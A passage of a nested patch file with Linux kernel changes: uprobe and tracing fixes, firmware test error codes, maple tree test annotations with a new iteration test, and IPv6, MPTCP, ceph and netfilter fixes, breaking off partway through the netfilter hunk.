+diff --git a/kernel/trace/trace_synth.h b/kernel/trace/trace_synth.h
+index b29595fe3ac5a..43f6fb6078dbf 100644
+--- a/kernel/trace/trace_synth.h
++++ b/kernel/trace/trace_synth.h
+@@ -18,6 +18,7 @@ struct synth_field {
+ 	bool is_signed;
+ 	bool is_string;
+ 	bool is_dynamic;
++	bool is_stack;
+ };
+ 
+ struct synth_event {
+diff --git a/kernel/trace/trace_uprobe.c b/kernel/trace/trace_uprobe.c
+index fb58e86dd1178..2ac06a642863a 100644
+--- a/kernel/trace/trace_uprobe.c
++++ b/kernel/trace/trace_uprobe.c
+@@ -170,7 +170,8 @@ fetch_store_string(unsigned long addr, void *dest, void *base)
+ 			 */
+ 			ret++;
+ 		*(u32 *)dest = make_data_loc(ret, (void *)dst - base);
+-	}
++	} else
++		*(u32 *)dest = make_data_loc(0, (void *)dst - base);
+ 
+ 	return ret;
+ }
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 13d3fa6aa972c..490a4179879a8 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -214,7 +214,7 @@ static int __kstrncpy(char **dst, const char *name, size_t count, gfp_t gfp)
+ {
+ 	*dst = kstrndup(name, count, gfp);
+ 	if (!*dst)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 	return count;
+ }
+ 
+@@ -671,7 +671,7 @@ static ssize_t trigger_request_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s'\n", name);
+ 
+@@ -719,7 +719,7 @@ static ssize_t trigger_request_platform_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("inserting test platform fw '%s'\n", name);
+ 	efi_embedded_fw.name = name;
+@@ -772,7 +772,7 @@ static ssize_t trigger_async_request_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s'\n", name);
+ 
+@@ -817,7 +817,7 @@ static ssize_t trigger_custom_fallback_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s' using custom fallback mechanism\n", name);
+ 
+@@ -868,7 +868,7 @@ static int test_fw_run_batch_request(void *data)
+ 
+ 		test_buf = kzalloc(TEST_FIRMWARE_BUF_SIZE, GFP_KERNEL);
+ 		if (!test_buf)
+-			return -ENOSPC;
++			return -ENOMEM;
+ 
+ 		if (test_fw_config->partial)
+ 			req->rc = request_partial_firmware_into_buf
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index f7364b9fee939..fad668042f3e7 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -30,54 +30,54 @@
+ #else
+ #define cond_resched()			do {} while (0)
+ #endif
+-static
+-int mtree_insert_index(struct maple_tree *mt, unsigned long index, gfp_t gfp)
++static int __init mtree_insert_index(struct maple_tree *mt,
++				     unsigned long index, gfp_t gfp)
+ {
+ 	return mtree_insert(mt, index, xa_mk_value(index & LONG_MAX), gfp);
+ }
+ 
+-static void mtree_erase_index(struct maple_tree *mt, unsigned long index)
++static void __init mtree_erase_index(struct maple_tree *mt, unsigned long index)
+ {
+ 	MT_BUG_ON(mt, mtree_erase(mt, index) != xa_mk_value(index & LONG_MAX));
+ 	MT_BUG_ON(mt, mtree_load(mt, index) != NULL);
+ }
+ 
+-static int mtree_test_insert(struct maple_tree *mt, unsigned long index,
++static int __init mtree_test_insert(struct maple_tree *mt, unsigned long index,
+ 				void *ptr)
+ {
+ 	return mtree_insert(mt, index, ptr, GFP_KERNEL);
+ }
+ 
+-static int mtree_test_store_range(struct maple_tree *mt, unsigned long start,
+-				unsigned long end, void *ptr)
++static int __init mtree_test_store_range(struct maple_tree *mt,
++			unsigned long start, unsigned long end, void *ptr)
+ {
+ 	return mtree_store_range(mt, start, end, ptr, GFP_KERNEL);
+ }
+ 
+-static int mtree_test_store(struct maple_tree *mt, unsigned long start,
++static int __init mtree_test_store(struct maple_tree *mt, unsigned long start,
+ 				void *ptr)
+ {
+ 	return mtree_test_store_range(mt, start, start, ptr);
+ }
+ 
+-static int mtree_test_insert_range(struct maple_tree *mt, unsigned long start,
+-				unsigned long end, void *ptr)
++static int __init mtree_test_insert_range(struct maple_tree *mt,
++			unsigned long start, unsigned long end, void *ptr)
+ {
+ 	return mtree_insert_range(mt, start, end, ptr, GFP_KERNEL);
+ }
+ 
+-static void *mtree_test_load(struct maple_tree *mt, unsigned long index)
++static void __init *mtree_test_load(struct maple_tree *mt, unsigned long index)
+ {
+ 	return mtree_load(mt, index);
+ }
+ 
+-static void *mtree_test_erase(struct maple_tree *mt, unsigned long index)
++static void __init *mtree_test_erase(struct maple_tree *mt, unsigned long index)
+ {
+ 	return mtree_erase(mt, index);
+ }
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_mtree_alloc_range(struct maple_tree *mt,
++static noinline void __init check_mtree_alloc_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, unsigned long size,
+ 		unsigned long expected, int eret, void *ptr)
+ {
+@@ -94,7 +94,7 @@ static noinline void check_mtree_alloc_range(struct maple_tree *mt,
+ 	MT_BUG_ON(mt, result != expected);
+ }
+ 
+-static noinline void check_mtree_alloc_rrange(struct maple_tree *mt,
++static noinline void __init check_mtree_alloc_rrange(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, unsigned long size,
+ 		unsigned long expected, int eret, void *ptr)
+ {
+@@ -112,8 +112,8 @@ static noinline void check_mtree_alloc_rrange(struct maple_tree *mt,
+ }
+ #endif
+ 
+-static noinline void check_load(struct maple_tree *mt, unsigned long index,
+-				void *ptr)
++static noinline void __init check_load(struct maple_tree *mt,
++				       unsigned long index, void *ptr)
+ {
+ 	void *ret = mtree_test_load(mt, index);
+ 
+@@ -122,7 +122,7 @@ static noinline void check_load(struct maple_tree *mt, unsigned long index,
+ 	MT_BUG_ON(mt, ret != ptr);
+ }
+ 
+-static noinline void check_store_range(struct maple_tree *mt,
++static noinline void __init check_store_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, void *ptr, int expected)
+ {
+ 	int ret = -EINVAL;
+@@ -138,7 +138,7 @@ static noinline void check_store_range(struct maple_tree *mt,
+ 		check_load(mt, i, ptr);
+ }
+ 
+-static noinline void check_insert_range(struct maple_tree *mt,
++static noinline void __init check_insert_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, void *ptr, int expected)
+ {
+ 	int ret = -EINVAL;
+@@ -154,8 +154,8 @@ static noinline void check_insert_range(struct maple_tree *mt,
+ 		check_load(mt, i, ptr);
+ }
+ 
+-static noinline void check_insert(struct maple_tree *mt, unsigned long index,
+-		void *ptr)
++static noinline void __init check_insert(struct maple_tree *mt,
++					 unsigned long index, void *ptr)
+ {
+ 	int ret = -EINVAL;
+ 
+@@ -163,7 +163,7 @@ static noinline void check_insert(struct maple_tree *mt, unsigned long index,
+ 	MT_BUG_ON(mt, ret != 0);
+ }
+ 
+-static noinline void check_dup_insert(struct maple_tree *mt,
++static noinline void __init check_dup_insert(struct maple_tree *mt,
+ 				      unsigned long index, void *ptr)
+ {
+ 	int ret = -EINVAL;
+@@ -173,13 +173,13 @@ static noinline void check_dup_insert(struct maple_tree *mt,
+ }
+ 
+ 
+-static noinline
+-void check_index_load(struct maple_tree *mt, unsigned long index)
++static noinline void __init check_index_load(struct maple_tree *mt,
++					     unsigned long index)
+ {
+ 	return check_load(mt, index, xa_mk_value(index & LONG_MAX));
+ }
+ 
+-static inline int not_empty(struct maple_node *node)
++static inline __init int not_empty(struct maple_node *node)
+ {
+ 	int i;
+ 
+@@ -194,8 +194,8 @@ static inline int not_empty(struct maple_node *node)
+ }
+ 
+ 
+-static noinline void check_rev_seq(struct maple_tree *mt, unsigned long max,
+-		bool verbose)
++static noinline void __init check_rev_seq(struct maple_tree *mt,
++					  unsigned long max, bool verbose)
+ {
+ 	unsigned long i = max, j;
+ 
+@@ -227,7 +227,7 @@ static noinline void check_rev_seq(struct maple_tree *mt, unsigned long max,
+ #endif
+ }
+ 
+-static noinline void check_seq(struct maple_tree *mt, unsigned long max,
++static noinline void __init check_seq(struct maple_tree *mt, unsigned long max,
+ 		bool verbose)
+ {
+ 	unsigned long i, j;
+@@ -256,7 +256,7 @@ static noinline void check_seq(struct maple_tree *mt, unsigned long max,
+ #endif
+ }
+ 
+-static noinline void check_lb_not_empty(struct maple_tree *mt)
++static noinline void __init check_lb_not_empty(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	unsigned long huge = 4000UL * 1000 * 1000;
+@@ -275,13 +275,13 @@ static noinline void check_lb_not_empty(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_lower_bound_split(struct maple_tree *mt)
++static noinline void __init check_lower_bound_split(struct maple_tree *mt)
+ {
+ 	MT_BUG_ON(mt, !mtree_empty(mt));
+ 	check_lb_not_empty(mt);
+ }
+ 
+-static noinline void check_upper_bound_split(struct maple_tree *mt)
++static noinline void __init check_upper_bound_split(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	unsigned long huge;
+@@ -306,7 +306,7 @@ static noinline void check_upper_bound_split(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_mid_split(struct maple_tree *mt)
++static noinline void __init check_mid_split(struct maple_tree *mt)
+ {
+ 	unsigned long huge = 8000UL * 1000 * 1000;
+ 
+@@ -315,7 +315,7 @@ static noinline void check_mid_split(struct maple_tree *mt)
+ 	check_lb_not_empty(mt);
+ }
+ 
+-static noinline void check_rev_find(struct maple_tree *mt)
++static noinline void __init check_rev_find(struct maple_tree *mt)
+ {
+ 	int i, nr_entries = 200;
+ 	void *val;
+@@ -354,7 +354,7 @@ static noinline void check_rev_find(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
+-static noinline void check_find(struct maple_tree *mt)
++static noinline void __init check_find(struct maple_tree *mt)
+ {
+ 	unsigned long val = 0;
+ 	unsigned long count;
+@@ -571,7 +571,7 @@ static noinline void check_find(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_find_2(struct maple_tree *mt)
++static noinline void __init check_find_2(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	void *entry;
+@@ -616,7 +616,7 @@ static noinline void check_find_2(struct maple_tree *mt)
+ 
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_alloc_rev_range(struct maple_tree *mt)
++static noinline void __init check_alloc_rev_range(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * Generated by:
+@@ -624,7 +624,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	 * awk -F "-" '{printf "0x%s, 0x%s, ", $1, $2}'
+ 	 */
+ 
+-	unsigned long range[] = {
++	static const unsigned long range[] = {
+ 	/*      Inclusive     , Exclusive. */
+ 		0x565234af2000, 0x565234af4000,
+ 		0x565234af4000, 0x565234af9000,
+@@ -652,7 +652,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 		0x7fff58791000, 0x7fff58793000,
+ 	};
+ 
+-	unsigned long holes[] = {
++	static const unsigned long holes[] = {
+ 		/*
+ 		 * Note: start of hole is INCLUSIVE
+ 		 *        end of hole is EXCLUSIVE
+@@ -672,7 +672,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	 * 4. number that should be returned.
+ 	 * 5. return value
+ 	 */
+-	unsigned long req_range[] = {
++	static const unsigned long req_range[] = {
+ 		0x565234af9000, /* Min */
+ 		0x7fff58791000, /* Max */
+ 		0x1000,         /* Size */
+@@ -783,7 +783,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_alloc_range(struct maple_tree *mt)
++static noinline void __init check_alloc_range(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * Generated by:
+@@ -791,7 +791,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 	 * awk -F "-" '{printf "0x%s, 0x%s, ", $1, $2}'
+ 	 */
+ 
+-	unsigned long range[] = {
++	static const unsigned long range[] = {
+ 	/*      Inclusive     , Exclusive. */
+ 		0x565234af2000, 0x565234af4000,
+ 		0x565234af4000, 0x565234af9000,
+@@ -818,7 +818,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 		0x7fff5878e000, 0x7fff58791000,
+ 		0x7fff58791000, 0x7fff58793000,
+ 	};
+-	unsigned long holes[] = {
++	static const unsigned long holes[] = {
+ 		/* Start of hole, end of hole,  size of hole (+1) */
+ 		0x565234afb000, 0x565234afc000, 0x1000,
+ 		0x565234afe000, 0x565235def000, 0x12F1000,
+@@ -833,7 +833,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 	 * 4. number that should be returned.
+ 	 * 5. return value
+ 	 */
+-	unsigned long req_range[] = {
++	static const unsigned long req_range[] = {
+ 		0x565234af9000, /* Min */
+ 		0x7fff58791000, /* Max */
+ 		0x1000,         /* Size */
+@@ -942,10 +942,10 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ }
+ #endif
+ 
+-static noinline void check_ranges(struct maple_tree *mt)
++static noinline void __init check_ranges(struct maple_tree *mt)
+ {
+ 	int i, val, val2;
+-	unsigned long r[] = {
++	static const unsigned long r[] = {
+ 		10, 15,
+ 		20, 25,
+ 		17, 22, /* Overlaps previous range. */
+@@ -1210,7 +1210,7 @@ static noinline void check_ranges(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mt_height(mt) != 4);
+ }
+ 
+-static noinline void check_next_entry(struct maple_tree *mt)
++static noinline void __init check_next_entry(struct maple_tree *mt)
+ {
+ 	void *entry = NULL;
+ 	unsigned long limit = 30, i = 0;
+@@ -1234,7 +1234,7 @@ static noinline void check_next_entry(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_prev_entry(struct maple_tree *mt)
++static noinline void __init check_prev_entry(struct maple_tree *mt)
+ {
+ 	unsigned long index = 16;
+ 	void *value;
+@@ -1278,7 +1278,7 @@ static noinline void check_prev_entry(struct maple_tree *mt)
+ 	mas_unlock(&mas);
+ }
+ 
+-static noinline void check_root_expand(struct maple_tree *mt)
++static noinline void __init check_root_expand(struct maple_tree *mt)
+ {
+ 	MA_STATE(mas, mt, 0, 0);
+ 	void *ptr;
+@@ -1367,13 +1367,13 @@ static noinline void check_root_expand(struct maple_tree *mt)
+ 	mas_unlock(&mas);
+ }
+ 
+-static noinline void check_gap_combining(struct maple_tree *mt)
++static noinline void __init check_gap_combining(struct maple_tree *mt)
+ {
+ 	struct maple_enode *mn1, *mn2;
+ 	void *entry;
+ 	unsigned long singletons = 100;
+-	unsigned long *seq100;
+-	unsigned long seq100_64[] = {
++	static const unsigned long *seq100;
++	static const unsigned long seq100_64[] = {
+ 		/* 0-5 */
+ 		74, 75, 76,
+ 		50, 100, 2,
+@@ -1387,7 +1387,7 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 		76, 2, 79, 85, 4,
+ 	};
+ 
+-	unsigned long seq100_32[] = {
++	static const unsigned long seq100_32[] = {
+ 		/* 0-5 */
+ 		61, 62, 63,
+ 		50, 100, 2,
+@@ -1401,11 +1401,11 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 		76, 2, 79, 85, 4,
+ 	};
+ 
+-	unsigned long seq2000[] = {
++	static const unsigned long seq2000[] = {
+ 		1152, 1151,
+ 		1100, 1200, 2,
+ 	};
+-	unsigned long seq400[] = {
++	static const unsigned long seq400[] = {
+ 		286, 318,
+ 		256, 260, 266, 270, 275, 280, 290, 398,
+ 		286, 310,
+@@ -1564,7 +1564,7 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ 	mtree_destroy(mt);
+ }
+-static noinline void check_node_overwrite(struct maple_tree *mt)
++static noinline void __init check_node_overwrite(struct maple_tree *mt)
+ {
+ 	int i, max = 4000;
+ 
+@@ -1577,7 +1577,7 @@ static noinline void check_node_overwrite(struct maple_tree *mt)
+ }
+ 
+ #if defined(BENCH_SLOT_STORE)
+-static noinline void bench_slot_store(struct maple_tree *mt)
++static noinline void __init bench_slot_store(struct maple_tree *mt)
+ {
+ 	int i, brk = 105, max = 1040, brk_start = 100, count = 20000000;
+ 
+@@ -1593,7 +1593,7 @@ static noinline void bench_slot_store(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_NODE_STORE)
+-static noinline void bench_node_store(struct maple_tree *mt)
++static noinline void __init bench_node_store(struct maple_tree *mt)
+ {
+ 	int i, overwrite = 76, max = 240, count = 20000000;
+ 
+@@ -1612,7 +1612,7 @@ static noinline void bench_node_store(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_AWALK)
+-static noinline void bench_awalk(struct maple_tree *mt)
++static noinline void __init bench_awalk(struct maple_tree *mt)
+ {
+ 	int i, max = 2500, count = 50000000;
+ 	MA_STATE(mas, mt, 1470, 1470);
+@@ -1629,7 +1629,7 @@ static noinline void bench_awalk(struct maple_tree *mt)
+ }
+ #endif
+ #if defined(BENCH_WALK)
+-static noinline void bench_walk(struct maple_tree *mt)
++static noinline void __init bench_walk(struct maple_tree *mt)
+ {
+ 	int i, max = 2500, count = 550000000;
+ 	MA_STATE(mas, mt, 1470, 1470);
+@@ -1646,7 +1646,7 @@ static noinline void bench_walk(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_MT_FOR_EACH)
+-static noinline void bench_mt_for_each(struct maple_tree *mt)
++static noinline void __init bench_mt_for_each(struct maple_tree *mt)
+ {
+ 	int i, count = 1000000;
+ 	unsigned long max = 2500, index = 0;
+@@ -1670,7 +1670,7 @@ static noinline void bench_mt_for_each(struct maple_tree *mt)
+ #endif
+ 
+ /* check_forking - simulate the kernel forking sequence with the tree. */
+-static noinline void check_forking(struct maple_tree *mt)
++static noinline void __init check_forking(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1709,7 +1709,75 @@ static noinline void check_forking(struct maple_tree *mt)
+ 	mtree_destroy(&newmt);
+ }
+ 
+-static noinline void check_mas_store_gfp(struct maple_tree *mt)
++static noinline void __init check_iteration(struct maple_tree *mt)
++{
++	int i, nr_entries = 125;
++	void *val;
++	MA_STATE(mas, mt, 0, 0);
++
++	for (i = 0; i <= nr_entries; i++)
++		mtree_store_range(mt, i * 10, i * 10 + 9,
++				  xa_mk_value(i), GFP_KERNEL);
++
++	mt_set_non_kernel(99999);
++
++	i = 0;
++	mas_lock(&mas);
++	mas_for_each(&mas, val, 925) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite end of entry 92 */
++		if (i == 92) {
++			mas.index = 925;
++			mas.last = 929;
++			mas_store(&mas, val);
++		}
++		i++;
++	}
++	/* Ensure mas_find() gets the next value */
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(i));
++
++	mas_set(&mas, 0);
++	i = 0;
++	mas_for_each(&mas, val, 785) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite start of entry 78 */
++		if (i == 78) {
++			mas.index = 780;
++			mas.last = 785;
++			mas_store(&mas, val);
++		} else {
++			i++;
++		}
++	}
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(i));
++
++	mas_set(&mas, 0);
++	i = 0;
++	mas_for_each(&mas, val, 765) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite end of entry 76 and advance to the end */
++		if (i == 76) {
++			mas.index = 760;
++			mas.last = 765;
++			mas_store(&mas, val);
++			mas_next(&mas, ULONG_MAX);
++		}
++		i++;
++	}
++	/* Make sure the next find returns the one after 765, 766-769 */
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(76));
++	mas_unlock(&mas);
++	mas_destroy(&mas);
++	mt_set_non_kernel(0);
++}
++
++static noinline void __init check_mas_store_gfp(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1742,7 +1810,7 @@ static noinline void check_mas_store_gfp(struct maple_tree *mt)
+ }
+ 
+ #if defined(BENCH_FORK)
+-static noinline void bench_forking(struct maple_tree *mt)
++static noinline void __init bench_forking(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1784,22 +1852,27 @@ static noinline void bench_forking(struct maple_tree *mt)
+ }
+ #endif
+ 
+-static noinline void next_prev_test(struct maple_tree *mt)
++static noinline void __init next_prev_test(struct maple_tree *mt)
+ {
+ 	int i, nr_entries;
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	struct maple_enode *mn;
+-	unsigned long *level2;
+-	unsigned long level2_64[] = {707, 1000, 710, 715, 720, 725};
+-	unsigned long level2_32[] = {1747, 2000, 1750, 1755, 1760, 1765};
++	static const unsigned long *level2;
++	static const unsigned long level2_64[] = { 707, 1000, 710, 715, 720,
++						   725};
++	static const unsigned long level2_32[] = { 1747, 2000, 1750, 1755,
++						   1760, 1765};
++	unsigned long last_index;
+ 
+ 	if (MAPLE_32BIT) {
+ 		nr_entries = 500;
+ 		level2 = level2_32;
++		last_index = 0x138e;
+ 	} else {
+ 		nr_entries = 200;
+ 		level2 = level2_64;
++		last_index = 0x7d6;
+ 	}
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+@@ -1906,7 +1979,7 @@ static noinline void next_prev_test(struct maple_tree *mt)
+ 
+ 	val = mas_next(&mas, ULONG_MAX);
+ 	MT_BUG_ON(mt, val != NULL);
+-	MT_BUG_ON(mt, mas.index != ULONG_MAX);
++	MT_BUG_ON(mt, mas.index != last_index);
+ 	MT_BUG_ON(mt, mas.last != ULONG_MAX);
+ 
+ 	val = mas_prev(&mas, 0);
+@@ -1960,7 +2033,7 @@ static noinline void next_prev_test(struct maple_tree *mt)
+ 
+ 
+ /* Test spanning writes that require balancing right sibling or right cousin */
+-static noinline void check_spanning_relatives(struct maple_tree *mt)
++static noinline void __init check_spanning_relatives(struct maple_tree *mt)
+ {
+ 
+ 	unsigned long i, nr_entries = 1000;
+@@ -1973,7 +2046,7 @@ static noinline void check_spanning_relatives(struct maple_tree *mt)
+ 	mtree_store_range(mt, 9365, 9955, NULL, GFP_KERNEL);
+ }
+ 
+-static noinline void check_fuzzer(struct maple_tree *mt)
++static noinline void __init check_fuzzer(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * 1. Causes a spanning rebalance of a single root node.
+@@ -2370,7 +2443,7 @@ static noinline void check_fuzzer(struct maple_tree *mt)
+ }
+ 
+ /* duplicate the tree with a specific gap */
+-static noinline void check_dup_gaps(struct maple_tree *mt,
++static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 				    unsigned long nr_entries, bool zero_start,
+ 				    unsigned long gap)
+ {
+@@ -2410,7 +2483,7 @@ static noinline void check_dup_gaps(struct maple_tree *mt,
+ }
+ 
+ /* Duplicate many sizes of trees.  Mainly to test expected entry values */
+-static noinline void check_dup(struct maple_tree *mt)
++static noinline void __init check_dup(struct maple_tree *mt)
+ {
+ 	int i;
+ 	int big_start = 100010;
+@@ -2498,7 +2571,7 @@ static noinline void check_dup(struct maple_tree *mt)
+ 	}
+ }
+ 
+-static noinline void check_bnode_min_spanning(struct maple_tree *mt)
++static noinline void __init check_bnode_min_spanning(struct maple_tree *mt)
+ {
+ 	int i = 50;
+ 	MA_STATE(mas, mt, 0, 0);
+@@ -2517,7 +2590,7 @@ static noinline void check_bnode_min_spanning(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ }
+ 
+-static noinline void check_empty_area_window(struct maple_tree *mt)
++static noinline void __init check_empty_area_window(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 20;
+ 	MA_STATE(mas, mt, 0, 0);
+@@ -2602,7 +2675,7 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
+-static noinline void check_empty_area_fill(struct maple_tree *mt)
++static noinline void __init check_empty_area_fill(struct maple_tree *mt)
+ {
+ 	const unsigned long max = 0x25D78000;
+ 	unsigned long size;
+@@ -2646,11 +2719,11 @@ static noinline void check_empty_area_fill(struct maple_tree *mt)
+ }
+ 
+ static DEFINE_MTREE(tree);
+-static int maple_tree_seed(void)
++static int __init maple_tree_seed(void)
+ {
+-	unsigned long set[] = {5015, 5014, 5017, 25, 1000,
+-			       1001, 1002, 1003, 1005, 0,
+-			       5003, 5002};
++	unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
++				1001, 1002, 1003, 1005, 0,
++				5003, 5002};
+ 	void *ptr = &set;
+ 
+ 	pr_info("\nTEST STARTING\n\n");
+@@ -2702,6 +2775,10 @@ static int maple_tree_seed(void)
+ 	goto skip;
+ #endif
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_iteration(&tree);
++	mtree_destroy(&tree);
++
+ 	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
+ 	check_forking(&tree);
+ 	mtree_destroy(&tree);
+@@ -2916,7 +2993,7 @@ skip:
+ 	return -EINVAL;
+ }
+ 
+-static void maple_tree_harvest(void)
++static void __exit maple_tree_harvest(void)
+ {
+ 
+ }
+diff --git a/net/ceph/messenger.c b/net/ceph/messenger.c
+index dfa237fbd5a32..09feb3f1fcaa3 100644
+--- a/net/ceph/messenger.c
++++ b/net/ceph/messenger.c
+@@ -1118,6 +1118,7 @@ bool ceph_addr_is_blank(const struct ceph_entity_addr *addr)
+ 		return true;
+ 	}
+ }
++EXPORT_SYMBOL(ceph_addr_is_blank);
+ 
+ int ceph_addr_port(const struct ceph_entity_addr *addr)
+ {
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 51bfc74805ecf..48a6486951cd6 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -2561,12 +2561,18 @@ static void manage_tempaddrs(struct inet6_dev *idev,
+ 			ipv6_ifa_notify(0, ift);
+ 	}
+ 
+-	if ((create || list_empty(&idev->tempaddr_list)) &&
+-	    idev->cnf.use_tempaddr > 0) {
++	/* Also create a temporary address if it's enabled but no temporary
++	 * address currently exists.
++	 * However, we get called with valid_lft == 0, prefered_lft == 0, create == false
++	 * as part of cleanup (ie. deleting the mngtmpaddr).
++	 * We don't want that to result in creating a new temporary ip address.
++	 */
++	if (list_empty(&idev->tempaddr_list) && (valid_lft || prefered_lft))
++		create = true;
++
++	if (create && idev->cnf.use_tempaddr > 0) {
+ 		/* When a new public address is created as described
+ 		 * in [ADDRCONF], also create a new temporary address.
+-		 * Also create a temporary address if it's enabled but
+-		 * no temporary address currently exists.
+ 		 */
+ 		read_unlock_bh(&idev->lock);
+ 		ipv6_create_tempaddr(ifp, false);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 4ca61e80f4bb2..f6f2e6417dcbe 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2945,9 +2945,9 @@ static void mptcp_check_listen_stop(struct sock *sk)
+ 		return;
+ 
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++	tcp_set_state(ssk, TCP_CLOSE);
+ 	mptcp_subflow_queue_clean(sk, ssk);
+ 	inet_csk_listen_stop(ssk);
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	release_sock(ssk);
+ }
+ 
+@@ -3746,12 +3746,18 @@ unlock:
+ static int mptcp_listen(struct socket *sock, int backlog)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sock->sk);
++	struct sock *sk = sock->sk;
+ 	struct socket *ssock;
+ 	int err;
+ 
+ 	pr_debug("msk=%p", msk);
+ 
+-	lock_sock(sock->sk);
++	lock_sock(sk);
++
++	err = -EINVAL;
++	if (sock->state != SS_UNCONNECTED || sock->type != SOCK_STREAM)
++		goto unlock;
++
+ 	ssock = __mptcp_nmpc_socket(msk);
+ 	if (!ssock) {
+ 		err = -EINVAL;
+@@ -3759,16 +3765,16 @@ static int mptcp_listen(struct socket *sock, int backlog)
+ 	}
+ 
+ 	mptcp_token_destroy(msk);
+-	inet_sk_state_store(sock->sk, TCP_LISTEN);
+-	sock_set_flag(sock->sk, SOCK_RCU_FREE);
++	inet_sk_state_store(sk, TCP_LISTEN);
++	sock_set_flag(sk, SOCK_RCU_FREE);
+ 
+ 	err = ssock->ops->listen(ssock, backlog);
+-	inet_sk_state_store(sock->sk, inet_sk_state_load(ssock->sk));
++	inet_sk_state_store(sk, inet_sk_state_load(ssock->sk));
+ 	if (!err)
+-		mptcp_copy_inaddrs(sock->sk, ssock->sk);
++		mptcp_copy_inaddrs(sk, ssock->sk);
+ 
+ unlock:
+-	release_sock(sock->sk);
++	release_sock(sk);
+ 	return err;
+ }
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index ecde497368ec4..dd57a9ebe113d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3626,8 +3626,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
